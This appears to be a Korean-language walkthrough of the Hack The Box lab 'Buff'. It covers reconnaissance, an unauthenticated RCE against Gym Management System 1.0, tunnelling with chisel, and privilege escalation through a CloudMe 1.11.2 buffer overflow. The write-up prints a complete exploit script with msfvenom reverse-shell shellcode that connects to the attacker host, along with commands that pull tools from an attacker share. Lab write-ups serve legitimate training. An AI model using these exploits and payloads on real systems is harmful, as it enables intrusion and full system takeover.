1. Recon
1.1. nmap
nmap 으로 정찰 결과 8080 포트에서 http 서비스 함을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# nmap -sC -sV 10.129.2.18 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-05 12:29 +04
Nmap scan report for 10.129.2.18
Host is up (0.26s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.92 seconds
1.2. 8080 port 웹 정찰
해당 포트에서 제공하는 웹 서비스에는 특별한 게 보이지 않았다.
하지만 Contact 에 들어가니 Gym Management Software 1.0 이라는 문구를 확인할 수 있었다.
2. 내부망 침투
2.1. searchsploit 검색
searchsploit 으로 검색한 결과 RCE가 되는 취약점이 존재하는 것을 확인했다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# searchsploit gym management
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
GYM MS - GYM Management System - Cross Site Scripting (Stored) | php/webapps/51777.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
2.2. 쉘 획득
해당 익스플로잇을 작동시키니 바로 쉘을 획득할 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# python2 48506.py http://10.129.2.18:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>
유저 중에 shaun 이라는 유저가 있었고 해당 유저의 Desktop 폴더에서 flag 를 확인할 수 있었다.
C:\xampp\htdocs\gym\upload> dir C:\Users\
�PNG
▒
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users
16/06/2020 19:52 <DIR> .
16/06/2020 19:52 <DIR> ..
05/01/2026 08:14 <DIR> Administrator
16/06/2020 14:08 <DIR> Public
16/06/2020 14:11 <DIR> shaun
0 File(s) 0 bytes
5 Dir(s) 8,337,043,456 bytes free
C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt
3. Lateral Movement
3.1. nc 설치
지금은 익스플로잇을 한 쉘이기 때문에 리버스 쉘을 맺어 안정적으로 운영하려고 nc 를 설치한다.
C:\xampp\htdocs\gym\upload> copy \\10.10.14.143\share\nc.exe .
�PNG
▒
1 file(s) copied.
C:\xampp\htdocs\gym\upload> dir
�PNG
▒
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
05/01/2026 09:39 <DIR> .
05/01/2026 09:39 <DIR> ..
05/01/2026 09:31 53 kamehameha.php
05/01/2026 09:39 59,392 nc.exe
2 File(s) 59,445 bytes
2 Dir(s) 8,518,074,368 bytes free
nc 를 설치한 이후, tasklist 를 통해서 내부에 하는 작업을 확인한다. 그 중에서 우리는 CloudMe.exe 가 눈에 띄는 것을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.2.18] 50372
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>
C:\xampp\htdocs\gym\upload>tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 28 K
Registry 104 0 4,576 K
smss.exe 364 0 416 K
csrss.exe 444 0 1,996 K
[...SNIP...]
CloudMe.exe 3832 0 37,700 K
timeout.exe 8164 0 3,968 K
tasklist.exe 4112 0 7,748 K
C:\xampp\htdocs\gym\upload>
3.2. CloudMe.exe 취약점 탐지
CloudMe.exe 는 Downloads 폴더에 존재했으며 버전으로 추정되는 1112 라는 숫자와 함께 붙어 있었다.
C:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 8,652,206,080 bytes free
searchsploit 을 확인해 보면 1112 라는 숫자가 1.11.2 버전임을 유추해볼 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# searchsploit cloudme
-------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
-------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
3.3. netstat 과 tasklist 를 통해 의심가는 프로그램 찾기
그 외에 추가적인 정보를 식별하기 위해 netstat 을 통해서 다른 서비스가 가동 중인지 확인한다. 그 중에 8888 번 포트에 무엇인가 서비스 중인 것을 확인할 수 있다.
C:\Users\shaun\Downloads>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 960
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6372
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 1180
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 8704
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 544
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1056
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1752
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2200
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 688
TCP 10.129.2.18:139 0.0.0.0:0 LISTENING 4
TCP 10.129.2.18:8080 10.10.14.143:44384 ESTABLISHED 8704
TCP 10.129.2.18:50377 10.10.14.143:443 ESTABLISHED 4492
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8816
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 1876
[...SNIP...]
원래라면 netstat 을 한 다음에 의심가는 포트에 대해서 PID 가 일치하는 프로그램을 찾아야 한다. 근데 이 머신에 대해서는 tasklist 를 했을 때 CloudMe.exe 의 경우에 PID 가 계속 바뀐다.
C:\xampp\htdocs\gym\upload>tasklist /v | findstr Cloud
tasklist /v | findstr Cloud
CloudMe.exe 5600 0 37,300 K Unknown N/A 0:00:00 N/A
C:\xampp\htdocs\gym\upload>tasklist /v | findstr Cloud
tasklist /v | findstr Cloud
CloudMe.exe 7108 0 37,232 K Unknown N/A 0:00:00 N/A
C:\xampp\htdocs\gym\upload>tasklist /v | findstr Cloud
tasklist /v | findstr Cloud
CloudMe.exe 8792 0 38,504 K Unknown N/A 0:00:00 N/A
그래서 8888 번 포트에 바로 해당하는 프로세스를 한 번에 찾는 파워쉘 코드를 이용했다.
C:\xampp\htdocs\gym\upload>powershell -c "Get-NetTCPConnection -LocalPort 8888 | Select-Object LocalPort, OwningProcess, @{Name='ProcessName';Expression={(Get-Process -Id $_.OwningProcess).ProcessName}}"
powershell -c "Get-NetTCPConnection -LocalPort 8888 | Select-Object LocalPort, OwningProcess, @{Name='ProcessName';Expression={(Get-Process -Id $_.OwningProcess).ProcessName}}"
LocalPort OwningProcess ProcessName
--------- ------------- -----------
8888 7764 CloudMe
3.4. chisel 이용 8888 포트 터널링
8888 번 포트는 내부 포트이기 때문에 kali 에서 바로 접근할 수가 없다. 그래서 해당 포트를 터널링을 해야 한다. Chisel 을 이용해서 터널링을 진행한다.
C:\ProgramData>copy \\10.10.14.143\share\Chisel.exe c.exe
copy \\10.10.14.143\share\Chisel.exe c.exe
The system cannot find the file specified.
C:\ProgramData>copy \\10.10.14.143\share\chisel.exe c.exe
copy \\10.10.14.143\share\chisel.exe c.exe
1 file(s) copied.
C:\ProgramData>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\ProgramData
05/01/2026 10:56 10,612,224 c.exe
16/06/2020 14:10 <DIR> Microsoft OneDrive
16/06/2020 14:14 <DIR> Package Cache
14/07/2020 12:17 <DIR> Packages
05/01/2026 10:55 <DIR> regid.1991-06.com.microsoft
11/04/2018 23:38 <DIR> SoftwareDistribution
16/06/2020 14:09 <DIR> USOPrivate
16/06/2020 14:09 <DIR> USOShared
16/06/2020 14:14 <DIR> VMware
12/04/2018 09:21 <DIR> WindowsHolographicDevices
1 File(s) 10,612,224 bytes
9 Dir(s) 9,797,062,656 bytes free
C:\ProgramData>.\c.exe client 10.10.14.143:8000 R:8888:localhost:8888
.\c.exe client 10.10.14.143:8000 R:8888:localhost:8888
2026/01/05 10:59:36 client: Connecting to ws://10.10.14.143:8000
2026/01/05 10:59:37 client: Connected (Latency 187.7175ms)
kali 에서 리버스쉘을 통해서 맺는다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# ./chisel_1.11.3_linux_arm64 server -p 9999 --reverse
2026/01/05 16:28:28 server: Reverse tunnelling enabled
2026/01/05 16:28:28 server: Fingerprint 8c9MqUC1R4cP+va/exEn9Sdw5k+YgykvwSNnMQJkZ6k=
2026/01/05 16:28:28 server: Listening on http://0.0.0.0:9999
2026/01/05 16:29:04 server: session#1: tun: proxy#R:8888=>8888: Listening
그리고 9999번 포트로 접근한다.
C:\ProgramData>.\c.exe client 10.10.14.143:9999 R:8888:127.0.0.1:8888
.\c.exe client 10.10.14.143:9999 R:8888:127.0.0.1:8888
2026/01/05 12:29:08 client: Connecting to ws://10.10.14.143:9999
2026/01/05 12:29:09 client: Connected (Latency 190.2364ms)
4. 권한 상승
4.1. 페이로드 만들기
CloudMe 에 대해서 RCE 가 searchsploit 에 존재하기 때문에 사용한다. 여기서 페이로드는 아래의 코드에서 확인할 수 있듯이 #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python 와 같이 돼있는데, 우리는 리버스 쉘을 맺을 것이기 때문에 다른 페이로드를 끼워넣을 것이다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# cat 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
일단 페이로드는 shell_reverse_tcp 로 수정을 한 다음에 LHOST 와 LPORT 를 지정한 다음에 페이로드를 새로 생성한다. 그리고 위의 코드에서 페이로드를 수정한 다음에 실행한다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.143 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1899 bytes
payload = b""
payload += b"\xbb\xa1\xf4\xb9\x42\xdb\xd9\xd9\x74\x24\xf4"
payload += b"\x58\x31\xc9\xb1\x52\x31\x58\x12\x03\x58\x12"
payload += b"\x83\x61\xf0\x5b\xb7\x9d\x11\x19\x38\x5d\xe2"
payload += b"\x7e\xb0\xb8\xd3\xbe\xa6\xc9\x44\x0f\xac\x9f"
payload += b"\x68\xe4\xe0\x0b\xfa\x88\x2c\x3c\x4b\x26\x0b"
payload += b"\x73\x4c\x1b\x6f\x12\xce\x66\xbc\xf4\xef\xa8"
payload += b"\xb1\xf5\x28\xd4\x38\xa7\xe1\x92\xef\x57\x85"
payload += b"\xef\x33\xdc\xd5\xfe\x33\x01\xad\x01\x15\x94"
payload += b"\xa5\x5b\xb5\x17\x69\xd0\xfc\x0f\x6e\xdd\xb7"
payload += b"\xa4\x44\xa9\x49\x6c\x95\x52\xe5\x51\x19\xa1"
payload += b"\xf7\x96\x9e\x5a\x82\xee\xdc\xe7\x95\x35\x9e"
payload += b"\x33\x13\xad\x38\xb7\x83\x09\xb8\x14\x55\xda"
payload += b"\xb6\xd1\x11\x84\xda\xe4\xf6\xbf\xe7\x6d\xf9"
payload += b"\x6f\x6e\x35\xde\xab\x2a\xed\x7f\xea\x96\x40"
payload += b"\x7f\xec\x78\x3c\x25\x67\x94\x29\x54\x2a\xf1"
payload += b"\x9e\x55\xd4\x01\x89\xee\xa7\x33\x16\x45\x2f"
payload += b"\x78\xdf\x43\xa8\x7f\xca\x34\x26\x7e\xf5\x44"
payload += b"\x6f\x45\xa1\x14\x07\x6c\xca\xfe\xd7\x91\x1f"
payload += b"\x50\x87\x3d\xf0\x11\x77\xfe\xa0\xf9\x9d\xf1"
payload += b"\x9f\x1a\x9e\xdb\xb7\xb1\x65\x8c\xbd\x4f\x6b"
payload += b"\xc3\xaa\x4d\x73\xda\x91\xdb\x95\xb6\xf5\x8d"
payload += b"\x0e\x2f\x6f\x94\xc4\xce\x70\x02\xa1\xd1\xfb"
payload += b"\xa1\x56\x9f\x0b\xcf\x44\x48\xfc\x9a\x36\xdf"
payload += b"\x03\x31\x5e\x83\x96\xde\x9e\xca\x8a\x48\xc9"
payload += b"\x9b\x7d\x81\x9f\x31\x27\x3b\xbd\xcb\xb1\x04"
payload += b"\x05\x10\x02\x8a\x84\xd5\x3e\xa8\x96\x23\xbe"
payload += b"\xf4\xc2\xfb\xe9\xa2\xbc\xbd\x43\x05\x16\x14"
payload += b"\x3f\xcf\xfe\xe1\x73\xd0\x78\xee\x59\xa6\x64"
payload += b"\x5f\x34\xff\x9b\x50\xd0\xf7\xe4\x8c\x40\xf7"
payload += b"\x3f\x15\x70\xb2\x1d\x3c\x19\x1b\xf4\x7c\x44"
payload += b"\x9c\x23\x42\x71\x1f\xc1\x3b\x86\x3f\xa0\x3e"
payload += b"\xc2\x87\x59\x33\x5b\x62\x5d\xe0\x5c\xa7"
4.2. 수정된 48389.py
수정된 코드는 아래와 같다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# cat 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xbb\xa1\xf4\xb9\x42\xdb\xd9\xd9\x74\x24\xf4"
payload += b"\x58\x31\xc9\xb1\x52\x31\x58\x12\x03\x58\x12"
payload += b"\x83\x61\xf0\x5b\xb7\x9d\x11\x19\x38\x5d\xe2"
payload += b"\x7e\xb0\xb8\xd3\xbe\xa6\xc9\x44\x0f\xac\x9f"
payload += b"\x68\xe4\xe0\x0b\xfa\x88\x2c\x3c\x4b\x26\x0b"
payload += b"\x73\x4c\x1b\x6f\x12\xce\x66\xbc\xf4\xef\xa8"
payload += b"\xb1\xf5\x28\xd4\x38\xa7\xe1\x92\xef\x57\x85"
payload += b"\xef\x33\xdc\xd5\xfe\x33\x01\xad\x01\x15\x94"
payload += b"\xa5\x5b\xb5\x17\x69\xd0\xfc\x0f\x6e\xdd\xb7"
payload += b"\xa4\x44\xa9\x49\x6c\x95\x52\xe5\x51\x19\xa1"
payload += b"\xf7\x96\x9e\x5a\x82\xee\xdc\xe7\x95\x35\x9e"
payload += b"\x33\x13\xad\x38\xb7\x83\x09\xb8\x14\x55\xda"
payload += b"\xb6\xd1\x11\x84\xda\xe4\xf6\xbf\xe7\x6d\xf9"
payload += b"\x6f\x6e\x35\xde\xab\x2a\xed\x7f\xea\x96\x40"
payload += b"\x7f\xec\x78\x3c\x25\x67\x94\x29\x54\x2a\xf1"
payload += b"\x9e\x55\xd4\x01\x89\xee\xa7\x33\x16\x45\x2f"
payload += b"\x78\xdf\x43\xa8\x7f\xca\x34\x26\x7e\xf5\x44"
payload += b"\x6f\x45\xa1\x14\x07\x6c\xca\xfe\xd7\x91\x1f"
payload += b"\x50\x87\x3d\xf0\x11\x77\xfe\xa0\xf9\x9d\xf1"
payload += b"\x9f\x1a\x9e\xdb\xb7\xb1\x65\x8c\xbd\x4f\x6b"
payload += b"\xc3\xaa\x4d\x73\xda\x91\xdb\x95\xb6\xf5\x8d"
payload += b"\x0e\x2f\x6f\x94\xc4\xce\x70\x02\xa1\xd1\xfb"
payload += b"\xa1\x56\x9f\x0b\xcf\x44\x48\xfc\x9a\x36\xdf"
payload += b"\x03\x31\x5e\x83\x96\xde\x9e\xca\x8a\x48\xc9"
payload += b"\x9b\x7d\x81\x9f\x31\x27\x3b\xbd\xcb\xb1\x04"
payload += b"\x05\x10\x02\x8a\x84\xd5\x3e\xa8\x96\x23\xbe"
payload += b"\xf4\xc2\xfb\xe9\xa2\xbc\xbd\x43\x05\x16\x14"
payload += b"\x3f\xcf\xfe\xe1\x73\xd0\x78\xee\x59\xa6\x64"
payload += b"\x5f\x34\xff\x9b\x50\xd0\xf7\xe4\x8c\x40\xf7"
payload += b"\x3f\x15\x70\xb2\x1d\x3c\x19\x1b\xf4\x7c\x44"
payload += b"\x9c\x23\x42\x71\x1f\xc1\x3b\x86\x3f\xa0\x3e"
payload += b"\xc2\x87\x59\x33\x5b\x62\x5d\xe0\x5c\xa7"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
해당 코드를 실행한다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# python 48389.py
LISTEN 하고 있던 kali 에서 정상적으로 관리자 계정으로 접근이 가능한 모습을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.2.18] 50472
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt